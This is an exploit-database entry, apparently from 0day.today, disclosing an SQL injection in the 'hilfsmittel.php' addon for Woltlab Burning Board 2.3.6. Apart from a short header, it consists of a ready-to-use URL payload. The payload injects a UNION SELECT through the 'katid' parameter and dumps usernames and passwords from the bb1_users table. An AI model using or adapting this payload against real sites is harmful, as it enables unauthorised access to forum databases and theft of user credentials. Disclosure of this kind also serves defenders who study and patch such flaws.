id: 15436
date: 02/22/2011
title: Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection
author: Crazyball
cves: 

[+] Autor: Crazyball
[+] Vulnerabilities [ SQL Injection ]
[+] Page: http://www.euweb.at/
[+] Language: [ PHP ]
[+] Version: Hilfsmitteldatenbank 1.0
[+] Date: n/a
[+] Vendor: http://www.woltlab.com/de/
 
##########################################################################################
 
[+] Vulnerability
 
 hilfsmittel.php?action=read&katid=
 
 
[+] Exploitable
 
 http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*



#  0day.today [2023-03-24]  #